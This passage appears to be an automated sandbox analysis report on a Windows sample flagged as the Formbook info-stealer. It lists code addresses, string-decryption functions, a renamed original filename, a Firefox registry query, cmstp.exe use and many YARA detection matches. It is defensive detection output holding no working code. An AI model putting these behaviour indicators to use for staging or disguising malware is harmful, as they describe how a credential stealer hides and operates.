Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0341523D3_2_0341523D
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034B22DD3_2_034B22DD
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034B1A993_2_034B1A99
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034042B03_2_034042B0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0341594B3_2_0341594B
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034399063_2_03439906
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034171103_2_03417110
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034A61DF3_2_034A61DF
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034B19E23_2_034B19E2
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034161803_2_03416180
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034BD9BE3_2_034BD9BE
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034110703_2_03411070
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034198103_2_03419810
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034AD0163_2_034AD016
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034100213_2_03410021
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0341E0203_2_0341E020
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034148CB3_2_034148CB
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034B28E83_2_034B28E8
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_033FA0803_2_033FA080
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034918B63_2_034918B6
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034B17463_2_034B1746
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034B1FCE3_2_034B1FCE
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034A27823_2_034A2782
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034057903_2_03405790
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034076403_2_03407640
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_03414E613_2_03414E61
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034ACE663_2_034ACE66
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_03415E703_2_03415E70
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034166113_2_03416611
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034B26F83_2_034B26F8
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034A3E963_2_034A3E96
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034A1D1B3_2_034A1D1B
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034B25193_2_034B2519
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034015303_2_03401530
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0348C53F3_2_0348C53F
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_033E0D403_2_033E0D40
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0349FDDB3_2_0349FDDB
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034AD5D23_2_034AD5D2
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_03491DE33_2_03491DE3
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0348E58A3_2_0348E58A
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034AE5813_2_034AE581
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_033F740C3_2_033F740C
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0341547E3_2_0341547E
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034014103_2_03401410
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0349F42B3_2_0349F42B
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034ADCC53_2_034ADCC5
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034A44EF3_2_034A44EF
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034B2C9A3_2_034B2C9A
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034B1C9F3_2_034B1C9F
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034A34903_2_034A3490
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003C78F03_2_003C78F0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003DB1CB3_2_003DB1CB
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003DAB603_2_003DAB60
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D9D483_2_003D9D48
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D9F033_2_003D9F03
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EC26F815_2_06EC26F8
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EB3E9615_2_06EB3E96
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E24E6115_2_06E24E61
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EBCE6615_2_06EBCE66
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E25E7015_2_06E25E70
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E1764015_2_06E17640
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E2661115_2_06E26611
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EC1FCE15_2_06EC1FCE
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EB278215_2_06EB2782
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E1579015_2_06E15790
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EC174615_2_06EC1746
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EB44EF15_2_06EB44EF
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EBDCC515_2_06EBDCC5
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EC1C9F15_2_06EC1C9F
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EC2C9A15_2_06EC2C9A
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EB349015_2_06EB3490
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E2547E15_2_06E2547E
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EAF42B15_2_06EAF42B
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E0740C15_2_06E0740C
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E1141015_2_06E11410
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EA1DE315_2_06EA1DE3
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EAFDDB15_2_06EAFDDB
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EBD5D215_2_06EBD5D2
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E9E58A15_2_06E9E58A
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EBE58115_2_06EBE581
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06DF0D4015_2_06DF0D40
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E1153015_2_06E11530
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E9C53F15_2_06E9C53F
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EB1D1B15_2_06EB1D1B
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EC251915_2_06EC2519
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06DD952815_2_06DD9528
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EC22DD15_2_06EC22DD
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E142B015_2_06E142B0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EC1A9915_2_06EC1A99
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E24A5B15_2_06E24A5B
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E2523D15_2_06E2523D
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EB0A0215_2_06EB0A02
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06ECE21415_2_06ECE214
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E263C215_2_06E263C2
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06DFEBE015_2_06DFEBE0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E24B9615_2_06E24B96
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E1FB4015_2_06E1FB40
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06DD331415_2_06DD3314
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E4531D15_2_06E4531D
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EC28E815_2_06EC28E8
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E248CB15_2_06E248CB
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EA18B615_2_06EA18B6
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E0A08015_2_06E0A080
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E2107015_2_06E21070
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E2E02015_2_06E2E020
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E2002115_2_06E20021
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E2981015_2_06E29810
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EBD01615_2_06EBD016
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EC19E215_2_06EC19E2
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06EB61DF15_2_06EB61DF
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06ECD9BE15_2_06ECD9BE
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E2618015_2_06E26180
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E2594B15_2_06E2594B
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E4990615_2_06E49906
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E2711015_2_06E27110
Found potential string decryption / allocating functionsShow sources
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: String function: 06DFB0E0 appears 176 times
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: String function: 06E4DDE8 appears 44 times
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: String function: 06E85110 appears 38 times
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0343DDE8 appears 48 times
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 033EB0E0 appears 176 times
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 03475110 appears 38 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: String function: 06E45110 appears 38 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: String function: 06DBB0E0 appears 176 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: String function: 06E0DDE8 appears 48 times
PE file contains strange resourcesShow sources
Source: ACre0O2rKa.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ACre0O2rKa.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5jd0x8e0uzsd8l.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5jd0x8e0uzsd8l.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: ACre0O2rKa.exe, 00000000.00000002.579024409.0000000000492000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000000.00000002.579614105.00000000020D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000000.00000002.579705323.0000000002220000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUsedly.exeFE2XFortogden7 vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000001.00000002.646807472.0000000006CA3000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000001.00000002.647439064.0000000006EAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000001.00000000.577859120.0000000000492000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe
Source: ACre0O2rKa.exeBinary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
Uses a Windows Living Off The Land Binaries (LOL bins)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Yara signature matchShow sources
Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
